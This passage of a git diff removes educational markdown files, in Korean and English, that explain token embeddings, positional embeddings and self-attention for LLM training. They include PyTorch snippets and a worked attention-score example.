3619, 402, 271, 10899], - [ 402, 271, 10899, 2138], - [ 271, 10899, 2138, 257]]), -# Target -tensor([[ 367, 2885, 1464, 1807], - [ 2885, 1464, 1807, 3619], - [ 1464, 1807, 3619, 402], - [ 1807, 3619, 402, 271], - [ 3619, 402, 271, 10899], - [ 402, 271, 10899, 2138], - [ 271, 10899, 2138, 257], - [10899, 2138, 257, 7026]]) -] - -# With stride=4 this will be the result: -[ -# Input -tensor([[ 40, 367, 2885, 1464], - [ 1807, 3619, 402, 271], - [10899, 2138, 257, 7026], - [15632, 438, 2016, 257], - [ 922, 5891, 1576, 438], - [ 568, 340, 373, 645], - [ 1049, 5975, 284, 502], - [ 284, 3285, 326, 11]]), -# Target -tensor([[ 367, 2885, 1464, 1807], - [ 3619, 402, 271, 10899], - [ 2138, 257, 7026, 15632], - [ 438, 2016, 257, 922], - [ 5891, 1576, 438, 568], - [ 340, 373, 645, 1049], - [ 5975, 284, 502, 284], - [ 3285, 326, 11, 287]]) -] -``` - -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) - diff --git a/src/todo/llm-training-data-preparation/3.-token-embeddings.md b/src/todo/llm-training-data-preparation/3.-token-embeddings.md deleted file mode 100644 index ec4441210..000000000 --- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md +++ /dev/null @@ -1,203 +0,0 @@ -# 3. ํ† ํฐ ์ž„๋ฒ ๋”ฉ - -## ํ† ํฐ ์ž„๋ฒ ๋”ฉ - -ํ…์ŠคํŠธ ๋ฐ์ดํ„ฐ๋ฅผ ํ† ํฐํ™”ํ•œ ํ›„, GPT์™€ ๊ฐ™์€ ๋Œ€ํ˜• ์–ธ์–ด ๋ชจ๋ธ(LLM)์„ ํ›ˆ๋ จํ•˜๊ธฐ ์œ„ํ•œ ๋ฐ์ดํ„ฐ ์ค€๋น„์˜ ๋‹ค์Œ ์ค‘์š”ํ•œ ๋‹จ๊ณ„๋Š” **ํ† ํฐ ์ž„๋ฒ ๋”ฉ**์„ ์ƒ์„ฑํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ํ† ํฐ ์ž„๋ฒ ๋”ฉ์€ ์ด์‚ฐ ํ† ํฐ(์˜ˆ: ๋‹จ์–ด ๋˜๋Š” ํ•˜์œ„ ๋‹จ์–ด)์„ ๋ชจ๋ธ์ด ์ฒ˜๋ฆฌํ•˜๊ณ  ํ•™์Šตํ•  ์ˆ˜ ์žˆ๋Š” ์—ฐ์†์ ์ธ ์ˆ˜์น˜ ๋ฒกํ„ฐ๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ์ด ์„ค๋ช…์€ ํ† ํฐ ์ž„๋ฒ ๋”ฉ, ์ดˆ๊ธฐํ™”, ์‚ฌ์šฉ๋ฒ• ๋ฐ ๋ชจ๋ธ์ด ํ† ํฐ ์‹œํ€€์Šค๋ฅผ ์ดํ•ดํ•˜๋Š” ๋ฐ ๋„์›€์„ ์ฃผ๋Š” ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ์—ญํ• ์„ ๋ถ„ํ•ดํ•ฉ๋‹ˆ๋‹ค. 
- -> [!TIP] -> ์ด ์„ธ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์–ดํœ˜์˜ ์ด์ „ ๊ฐ ํ† ํฐ์— ์›ํ•˜๋Š” ์ฐจ์›์˜ ๋ฒกํ„ฐ๋ฅผ ํ• ๋‹นํ•˜์—ฌ ๋ชจ๋ธ์„ ํ›ˆ๋ จ์‹œํ‚ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.** ์–ดํœ˜์˜ ๊ฐ ๋‹จ์–ด๋Š” X ์ฐจ์›์˜ ๊ณต๊ฐ„์—์„œ ํ•œ ์ ์ด ๋ฉ๋‹ˆ๋‹ค.\ -> ๊ฐ ๋‹จ์–ด์˜ ์ดˆ๊ธฐ ์œ„์น˜๋Š” "๋ฌด์ž‘์œ„๋กœ" ์ดˆ๊ธฐํ™”๋˜๋ฉฐ, ์ด๋Ÿฌํ•œ ์œ„์น˜๋Š” ํ›ˆ๋ จ ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜์ž…๋‹ˆ๋‹ค(ํ›ˆ๋ จ ์ค‘์— ๊ฐœ์„ ๋ฉ๋‹ˆ๋‹ค). -> -> ๊ฒŒ๋‹ค๊ฐ€, ํ† ํฐ ์ž„๋ฒ ๋”ฉ ๋™์•ˆ **๋˜ ๋‹ค๋ฅธ ์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด๊ฐ€ ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค**. ์ด๋Š” (์ด ๊ฒฝ์šฐ) **ํ›ˆ๋ จ ๋ฌธ์žฅ์—์„œ ๋‹จ์–ด์˜ ์ ˆ๋Œ€ ์œ„์น˜๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค**. ์ด๋ ‡๊ฒŒ ํ•˜๋ฉด ๋ฌธ์žฅ์—์„œ ์„œ๋กœ ๋‹ค๋ฅธ ์œ„์น˜์— ์žˆ๋Š” ๋‹จ์–ด๋Š” ์„œ๋กœ ๋‹ค๋ฅธ ํ‘œํ˜„(์˜๋ฏธ)์„ ๊ฐ–๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. - -### **ํ† ํฐ ์ž„๋ฒ ๋”ฉ์ด๋ž€ ๋ฌด์—‡์ธ๊ฐ€?** - -**ํ† ํฐ ์ž„๋ฒ ๋”ฉ**์€ ์—ฐ์† ๋ฒกํ„ฐ ๊ณต๊ฐ„์—์„œ ํ† ํฐ์˜ ์ˆ˜์น˜์  ํ‘œํ˜„์ž…๋‹ˆ๋‹ค. ์–ดํœ˜์˜ ๊ฐ ํ† ํฐ์€ ๊ณ ์ •๋œ ์ฐจ์›์˜ ๊ณ ์œ ํ•œ ๋ฒกํ„ฐ์™€ ์—ฐ๊ฒฐ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ฒกํ„ฐ๋Š” ํ† ํฐ์— ๋Œ€ํ•œ ์˜๋ฏธ์  ๋ฐ ๊ตฌ๋ฌธ์  ์ •๋ณด๋ฅผ ์บก์ฒ˜ํ•˜์—ฌ ๋ชจ๋ธ์ด ๋ฐ์ดํ„ฐ์˜ ๊ด€๊ณ„์™€ ํŒจํ„ด์„ ์ดํ•ดํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. - -- **์–ดํœ˜ ํฌ๊ธฐ:** ๋ชจ๋ธ์˜ ์–ดํœ˜์— ์žˆ๋Š” ๊ณ ์œ ํ•œ ํ† ํฐ(์˜ˆ: ๋‹จ์–ด, ํ•˜์œ„ ๋‹จ์–ด)์˜ ์ด ์ˆ˜. -- **์ž„๋ฒ ๋”ฉ ์ฐจ์›:** ๊ฐ ํ† ํฐ์˜ ๋ฒกํ„ฐ์— ์žˆ๋Š” ์ˆ˜์น˜ ๊ฐ’(์ฐจ์›)์˜ ์ˆ˜. ๋” ๋†’์€ ์ฐจ์›์€ ๋” ๋ฏธ์„ธํ•œ ์ •๋ณด๋ฅผ ์บก์ฒ˜ํ•  ์ˆ˜ ์žˆ์ง€๋งŒ ๋” ๋งŽ์€ ๊ณ„์‚ฐ ์ž์›์„ ์š”๊ตฌํ•ฉ๋‹ˆ๋‹ค. - -**์˜ˆ์‹œ:** - -- **์–ดํœ˜ ํฌ๊ธฐ:** 6 ํ† ํฐ \[1, 2, 3, 4, 5, 6] -- **์ž„๋ฒ ๋”ฉ ์ฐจ์›:** 3 (x, y, z) - -### **ํ† ํฐ ์ž„๋ฒ ๋”ฉ ์ดˆ๊ธฐํ™”** - -ํ›ˆ๋ จ ์‹œ์ž‘ ์‹œ, ํ† ํฐ ์ž„๋ฒ ๋”ฉ์€ ์ผ๋ฐ˜์ ์œผ๋กœ ์ž‘์€ ๋ฌด์ž‘์œ„ ๊ฐ’์œผ๋กœ ์ดˆ๊ธฐํ™”๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ดˆ๊ธฐ ๊ฐ’์€ ํ›ˆ๋ จ ๋ฐ์ดํ„ฐ๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ† ํฐ์˜ ์˜๋ฏธ๋ฅผ ๋” ์ž˜ ๋‚˜ํƒ€๋‚ด๊ธฐ ์œ„ํ•ด ํ›ˆ๋ จ ์ค‘์— ์กฐ์ •(๋ฏธ์„ธ ์กฐ์ •)๋ฉ๋‹ˆ๋‹ค. - -**PyTorch ์˜ˆ์‹œ:** -```python -import torch - -# Set a random seed for reproducibility -torch.manual_seed(123) - -# Create an embedding layer with 6 tokens and 3 dimensions -embedding_layer = torch.nn.Embedding(6, 3) - -# Display the initial weights (embeddings) -print(embedding_layer.weight) -``` -**์ถœ๋ ฅ:** -```lua -luaCopy codeParameter containing: -tensor([[ 0.3374, -0.1778, -0.1690], -[ 0.9178, 1.5810, 1.3010], -[ 1.2753, -0.2010, -0.1606], -[-0.4015, 0.9666, -1.1481], -[-1.1589, 0.3255, -0.6315], -[-2.8400, -0.7849, -1.4096]], requires_grad=True) -``` -**์„ค๋ช…:** - -- ๊ฐ ํ–‰์€ ์–ดํœ˜์˜ ํ† ํฐ์— ํ•ด๋‹นํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ ์—ด์€ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ์˜ ์ฐจ์›์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. -- ์˜ˆ๋ฅผ ๋“ค์–ด, ์ธ๋ฑ์Šค `3`์— ์žˆ๋Š” ํ† ํฐ์€ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ `[-0.4015, 0.9666, -1.1481]`๋ฅผ ๊ฐ€์ง‘๋‹ˆ๋‹ค. - -**ํ† ํฐ์˜ ์ž„๋ฒ ๋”ฉ ์ ‘๊ทผํ•˜๊ธฐ:** -```python -# Retrieve the embedding for the token at index 3 -token_index = torch.tensor([3]) -print(embedding_layer(token_index)) -``` -**์ถœ๋ ฅ:** -```lua -tensor([[-0.4015, 0.9666, -1.1481]], grad_fn=) -``` -**ํ•ด์„:** - -- ์ธ๋ฑ์Šค `3`์˜ ํ† ํฐ์€ ๋ฒกํ„ฐ `[-0.4015, 0.9666, -1.1481]`๋กœ ํ‘œํ˜„๋ฉ๋‹ˆ๋‹ค. -- ์ด๋Ÿฌํ•œ ๊ฐ’๋“ค์€ ๋ชจ๋ธ์ด ํ›ˆ๋ จ ์ค‘์— ์กฐ์ •ํ•˜์—ฌ ํ† ํฐ์˜ ๋งฅ๋ฝ๊ณผ ์˜๋ฏธ๋ฅผ ๋” ์ž˜ ํ‘œํ˜„ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ํ•™์Šต ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜์ž…๋‹ˆ๋‹ค. - -### **ํ›ˆ๋ จ ์ค‘ ํ† ํฐ ์ž„๋ฒ ๋”ฉ ์ž‘๋™ ๋ฐฉ์‹** - -ํ›ˆ๋ จ ์ค‘์— ์ž…๋ ฅ ๋ฐ์ดํ„ฐ์˜ ๊ฐ ํ† ํฐ์€ ํ•ด๋‹น ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ๋กœ ๋ณ€ํ™˜๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ฒกํ„ฐ๋Š” ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜ ๋ฐ ์‹ ๊ฒฝ๋ง ๋ ˆ์ด์–ด์™€ ๊ฐ™์€ ๋ชจ๋ธ ๋‚ด์˜ ๋‹ค์–‘ํ•œ ๊ณ„์‚ฐ์— ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. 
- -**์˜ˆ์‹œ ์‹œ๋‚˜๋ฆฌ์˜ค:** - -- **๋ฐฐ์น˜ ํฌ๊ธฐ:** 8 (๋™์‹œ์— ์ฒ˜๋ฆฌ๋˜๋Š” ์ƒ˜ํ”Œ ์ˆ˜) -- **์ตœ๋Œ€ ์‹œํ€€์Šค ๊ธธ์ด:** 4 (์ƒ˜ํ”Œ๋‹น ํ† ํฐ ์ˆ˜) -- **์ž„๋ฒ ๋”ฉ ์ฐจ์›:** 256 - -**๋ฐ์ดํ„ฐ ๊ตฌ์กฐ:** - -- ๊ฐ ๋ฐฐ์น˜๋Š” `(batch_size, max_length, embedding_dim)` ํ˜•ํƒœ์˜ 3D ํ…์„œ๋กœ ํ‘œํ˜„๋ฉ๋‹ˆ๋‹ค. -- ์šฐ๋ฆฌ์˜ ์˜ˆ์‹œ์—์„œ๋Š” ํ˜•ํƒœ๊ฐ€ `(8, 4, 256)`์ด ๋ฉ๋‹ˆ๋‹ค. - -**์‹œ๊ฐํ™”:** -```css -cssCopy codeBatch -โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” -โ”‚ Sample 1 โ”‚ -โ”‚ โ”Œโ”€โ”€โ”€โ”€โ”€โ” โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ†’ [xโ‚โ‚, xโ‚โ‚‚, ..., xโ‚โ‚‚โ‚…โ‚†] -โ”‚ โ”‚ 1 โ”‚ โ”‚ -โ”‚ โ”‚... โ”‚ โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ”‚ -โ”‚ โ”‚ 4 โ”‚ โ”‚ -โ”‚ โ””โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚ -โ”‚ Sample 2 โ”‚ -โ”‚ โ”Œโ”€โ”€โ”€โ”€โ”€โ” โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ†’ [xโ‚‚โ‚, xโ‚‚โ‚‚, ..., xโ‚‚โ‚‚โ‚…โ‚†] -โ”‚ โ”‚ 1 โ”‚ โ”‚ -โ”‚ โ”‚... โ”‚ โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ”‚ -โ”‚ โ”‚ 4 โ”‚ โ”‚ -โ”‚ โ””โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚ -โ”‚ ... โ”‚ -โ”‚ Sample 8 โ”‚ -โ”‚ โ”Œโ”€โ”€โ”€โ”€โ”€โ” โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ†’ [xโ‚ˆโ‚, xโ‚ˆโ‚‚, ..., xโ‚ˆโ‚‚โ‚…โ‚†] -โ”‚ โ”‚ 1 โ”‚ โ”‚ -โ”‚ โ”‚... โ”‚ โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ”‚ -โ”‚ โ”‚ 4 โ”‚ โ”‚ -โ”‚ โ””โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚ -โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ -``` -**์„ค๋ช…:** - -- ์‹œํ€€์Šค์˜ ๊ฐ ํ† ํฐ์€ 256์ฐจ์› ๋ฒกํ„ฐ๋กœ ํ‘œํ˜„๋ฉ๋‹ˆ๋‹ค. -- ๋ชจ๋ธ์€ ์ด๋Ÿฌํ•œ ์ž„๋ฒ ๋”ฉ์„ ์ฒ˜๋ฆฌํ•˜์—ฌ ์–ธ์–ด ํŒจํ„ด์„ ํ•™์Šตํ•˜๊ณ  ์˜ˆ์ธก์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. - -## **์œ„์น˜ ์ž„๋ฒ ๋”ฉ: ํ† ํฐ ์ž„๋ฒ ๋”ฉ์— ๋งฅ๋ฝ ์ถ”๊ฐ€ํ•˜๊ธฐ** - -ํ† ํฐ ์ž„๋ฒ ๋”ฉ์ด ๊ฐœ๋ณ„ ํ† ํฐ์˜ ์˜๋ฏธ๋ฅผ ํฌ์ฐฉํ•˜๋Š” ๋ฐ˜๋ฉด, ์‹œํ€€์Šค ๋‚ด์—์„œ ํ† ํฐ์˜ ์œ„์น˜๋ฅผ ๋ณธ์งˆ์ ์œผ๋กœ ์ธ์ฝ”๋”ฉํ•˜์ง€๋Š” ์•Š์Šต๋‹ˆ๋‹ค. ํ† ํฐ์˜ ์ˆœ์„œ๋ฅผ ์ดํ•ดํ•˜๋Š” ๊ฒƒ์€ ์–ธ์–ด ์ดํ•ด์— ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ **์œ„์น˜ ์ž„๋ฒ ๋”ฉ**์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. - -### **์œ„์น˜ ์ž„๋ฒ ๋”ฉ์ด ํ•„์š”ํ•œ ์ด์œ :** - -- **ํ† ํฐ ์ˆœ์„œ์˜ ์ค‘์š”์„ฑ:** ๋ฌธ์žฅ์—์„œ ์˜๋ฏธ๋Š” ์ข…์ข… ๋‹จ์–ด์˜ ์ˆœ์„œ์— ๋”ฐ๋ผ ๋‹ฌ๋ผ์ง‘๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, "๊ณ ์–‘์ด๊ฐ€ ๋งคํŠธ ์œ„์— ์•‰์•˜๋‹ค"์™€ "๋งคํŠธ๊ฐ€ ๊ณ ์–‘์ด ์œ„์— ์•‰์•˜๋‹ค." -- **์ž„๋ฒ ๋”ฉ ํ•œ๊ณ„:** ์œ„์น˜ ์ •๋ณด๊ฐ€ ์—†์œผ๋ฉด ๋ชจ๋ธ์€ ํ† ํฐ์„ "๋‹จ์–ด์˜ ๊ฐ€๋ฐฉ"์œผ๋กœ ์ทจ๊ธ‰ํ•˜์—ฌ ์‹œํ€€์Šค๋ฅผ ๋ฌด์‹œํ•ฉ๋‹ˆ๋‹ค. - -### **์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ์œ ํ˜•:** - -1. **์ ˆ๋Œ€ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ:** -- ์‹œํ€€์Šค์˜ ๊ฐ ์œ„์น˜์— ๊ณ ์œ ํ•œ ์œ„์น˜ ๋ฒกํ„ฐ๋ฅผ ํ• ๋‹นํ•ฉ๋‹ˆ๋‹ค. -- **์˜ˆ์‹œ:** ์–ด๋–ค ์‹œํ€€์Šค์˜ ์ฒซ ๋ฒˆ์งธ ํ† ํฐ์€ ๋™์ผํ•œ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์„ ๊ฐ€์ง€๋ฉฐ, ๋‘ ๋ฒˆ์งธ ํ† ํฐ์€ ๋‹ค๋ฅธ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **์‚ฌ์šฉ ์˜ˆ:** OpenAI์˜ GPT ๋ชจ๋ธ. -2. **์ƒ๋Œ€ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ:** -- ํ† ํฐ์˜ ์ ˆ๋Œ€ ์œ„์น˜๊ฐ€ ์•„๋‹Œ ์ƒ๋Œ€์  ๊ฑฐ๋ฆฌ๋ฅผ ์ธ์ฝ”๋”ฉํ•ฉ๋‹ˆ๋‹ค. -- **์˜ˆ์‹œ:** ๋‘ ํ† ํฐ์ด ์–ผ๋งˆ๋‚˜ ๋–จ์–ด์ ธ ์žˆ๋Š”์ง€๋ฅผ ๋‚˜ํƒ€๋‚ด๋ฉฐ, ์‹œํ€€์Šค ๋‚ด์—์„œ์˜ ์ ˆ๋Œ€ ์œ„์น˜์™€๋Š” ๊ด€๊ณ„์—†์ด ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค. -- **์‚ฌ์šฉ ์˜ˆ:** Transformer-XL ๋ฐ BERT์˜ ์ผ๋ถ€ ๋ณ€ํ˜• ๋ชจ๋ธ. - -### **์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ํ†ตํ•ฉ ๋ฐฉ๋ฒ•:** - -- **๋™์ผํ•œ ์ฐจ์›:** ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์€ ํ† ํฐ ์ž„๋ฒ ๋”ฉ๊ณผ ๋™์ผํ•œ ์ฐจ์›์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **๋ง์…ˆ:** ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์€ ํ† ํฐ ์ž„๋ฒ ๋”ฉ์— ์ถ”๊ฐ€๋˜์–ด ํ† ํฐ์˜ ์ •์ฒด์„ฑ๊ณผ ์œ„์น˜ ์ •๋ณด๋ฅผ ๊ฒฐํ•ฉํ•˜์ง€๋งŒ ์ „์ฒด ์ฐจ์›์€ ์ฆ๊ฐ€ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. - -**์œ„์น˜ ์ž„๋ฒ ๋”ฉ ์ถ”๊ฐ€ ์˜ˆ์‹œ:** - -ํ† ํฐ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ๊ฐ€ `[0.5, -0.2, 0.1]`์ด๊ณ  ๊ทธ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ๊ฐ€ `[0.1, 0.3, -0.1]`๋ผ๊ณ  ๊ฐ€์ •ํ•ฉ์‹œ๋‹ค. 
๋ชจ๋ธ์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๊ฒฐํ•ฉ ์ž„๋ฒ ๋”ฉ์€: -```css -Combined Embedding = Token Embedding + Positional Embedding -= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)] -= [0.6, 0.1, 0.0] -``` -**์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ์ด์ :** - -- **๋งฅ๋ฝ ์ธ์‹:** ๋ชจ๋ธ์€ ํ† ํฐ์˜ ์œ„์น˜์— ๋”ฐ๋ผ ๊ตฌ๋ถ„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- **์‹œํ€€์Šค ์ดํ•ด:** ๋ชจ๋ธ์ด ๋ฌธ๋ฒ•, ๊ตฌ๋ฌธ ๋ฐ ๋งฅ๋ฝ ์˜์กด์  ์˜๋ฏธ๋ฅผ ์ดํ•ดํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. - -## ์ฝ”๋“œ ์˜ˆ์ œ - -๋‹ค์Œ์€ [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb)์—์„œ ๊ฐ€์ ธ์˜จ ์ฝ”๋“œ ์˜ˆ์ œ์ž…๋‹ˆ๋‹ค: -```python -# Use previous code... - -# Create dimensional emdeddings -""" -BPE uses a vocabulary of 50257 words -Let's supose we want to use 256 dimensions (instead of the millions used by LLMs) -""" - -vocab_size = 50257 -output_dim = 256 -token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim) - -## Generate the dataloader like before -max_length = 4 -dataloader = create_dataloader_v1( -raw_text, batch_size=8, max_length=max_length, -stride=max_length, shuffle=False -) -data_iter = iter(dataloader) -inputs, targets = next(data_iter) - -# Apply embeddings -token_embeddings = token_embedding_layer(inputs) -print(token_embeddings.shape) -torch.Size([8, 4, 256]) # 8 x 4 x 256 - -# Generate absolute embeddings -context_length = max_length -pos_embedding_layer = torch.nn.Embedding(context_length, output_dim) - -pos_embeddings = pos_embedding_layer(torch.arange(max_length)) - -input_embeddings = token_embeddings + pos_embeddings -print(input_embeddings.shape) # torch.Size([8, 4, 256]) -``` -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md deleted file mode 100644 index f73f9f1b3..000000000 --- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md +++ /dev/null @@ -1,416 +0,0 @@ -# 4. Attention Mechanisms - -## Attention Mechanisms and Self-Attention in Neural Networks - -Attention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation. - -> [!TIP] -> The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\ -> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information. - -### Understanding Attention Mechanisms - -In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token. 
- -#### Example: Machine Translation - -Consider translating the German sentence "Kannst du mir helfen diesen Satz zu รผbersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation. - -### Introduction to Self-Attention - -Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence. - -#### Key Concepts - -- **Tokens**: ์ž…๋ ฅ ์‹œํ€€์Šค์˜ ๊ฐœ๋ณ„ ์š”์†Œ (์˜ˆ: ๋ฌธ์žฅ์˜ ๋‹จ์–ด). -- **Embeddings**: ์˜๋ฏธ ์ •๋ณด๋ฅผ ํฌ์ฐฉํ•˜๋Š” ํ† ํฐ์˜ ๋ฒกํ„ฐ ํ‘œํ˜„. -- **Attention Weights**: ๋‹ค๋ฅธ ํ† ํฐ์— ๋Œ€ํ•œ ๊ฐ ํ† ํฐ์˜ ์ค‘์š”์„ฑ์„ ๊ฒฐ์ •ํ•˜๋Š” ๊ฐ’. - -### Calculating Attention Weights: A Step-by-Step Example - -Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding: - -- **Hello**: `[0.34, 0.22, 0.54]` -- **shiny**: `[0.53, 0.34, 0.98]` -- **sun**: `[0.29, 0.54, 0.93]` - -Our goal is to compute the **context vector** for the word **"shiny"** using self-attention. - -#### Step 1: Compute Attention Scores - -> [!TIP] -> Just multiply each dimension value of the query with the relevant one of each token and add the results. You get 1 value per pair of tokens. - -For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings. - -**Attention Score between "Hello" and "shiny"** - -
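`score("Hello", "shiny") = 0.34·0.53 + 0.22·0.34 + 0.54·0.98 = 0.1802 + 0.0748 + 0.5292 ≈ 0.7842`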
- -**Attention Score between "shiny" and "shiny"** - -
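`score("shiny", "shiny") = 0.53·0.53 + 0.34·0.34 + 0.98·0.98 = 0.2809 + 0.1156 + 0.9604 ≈ 1.3569`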
- -**Attention Score between "sun" and "shiny"** - -
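`score("sun", "shiny") = 0.29·0.53 + 0.54·0.34 + 0.93·0.98 = 0.1537 + 0.1836 + 0.9114 ≈ 1.2487`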
- -#### Step 2: Normalize Attention Scores to Obtain Attention Weights - -> [!TIP] -> Don't get lost in the mathematical terms, the goal of this function is simple, normalize all the weights so **they sum 1 in total**. -> -> Moreover, **softmax** function is used because it accentuates differences due to the exponential part, making easier to detect useful values. - -Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1. - -
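```math
w_i = \frac{e^{\text{score}_i}}{\sum_{j} e^{\text{score}_j}}
```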
- -Calculating the exponentials: - -
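`e^0.7842 ≈ 2.1907,  e^1.3569 ≈ 3.8841,  e^1.2487 ≈ 3.4858`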
- -Calculating the sum: - -
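`2.1907 + 3.8841 + 3.4858 ≈ 9.5606`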
- -Calculating attention weights: - -
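`w("Hello") ≈ 2.1907 / 9.5606 ≈ 0.2291,  w("shiny") ≈ 3.8841 / 9.5606 ≈ 0.4063,  w("sun") ≈ 3.4858 / 9.5606 ≈ 0.3646`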
- -#### Step 3: Compute the Context Vector - -> [!TIP] -> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector) - -The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights. - -
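```math
\text{context vector} = w_{\text{Hello}} \cdot E_{\text{Hello}} + w_{\text{shiny}} \cdot E_{\text{shiny}} + w_{\text{sun}} \cdot E_{\text{sun}}
```

(where `E_x` is the embedding of word *x* and `w_x` its attention weight from the previous step).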
- -Calculating each component: - -- **Weighted Embedding of "Hello"**: - -
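`0.2291 × [0.34, 0.22, 0.54] ≈ [0.0779, 0.0504, 0.1237]`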
- -- **Weighted Embedding of "shiny"**: - -
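`0.4063 × [0.53, 0.34, 0.98] ≈ [0.2156, 0.1382, 0.3983]`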
- -- **Weighted Embedding of "sun"**: - -
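`0.3646 × [0.29, 0.54, 0.93] ≈ [0.1057, 0.1972, 0.3390]`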
- -Summing the weighted embeddings: - -`context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]` - -**This context vector represents the enriched embedding for the word "shiny," incorporating information from all words in the sentence.** - -### Summary of the Process - -1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all words in the sequence. -2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1. -3. **Compute Context Vector**: Multiply each word's embedding by its attention weight and sum the results. - -## Self-Attention with Trainable Weights - -In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices: - -
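```math
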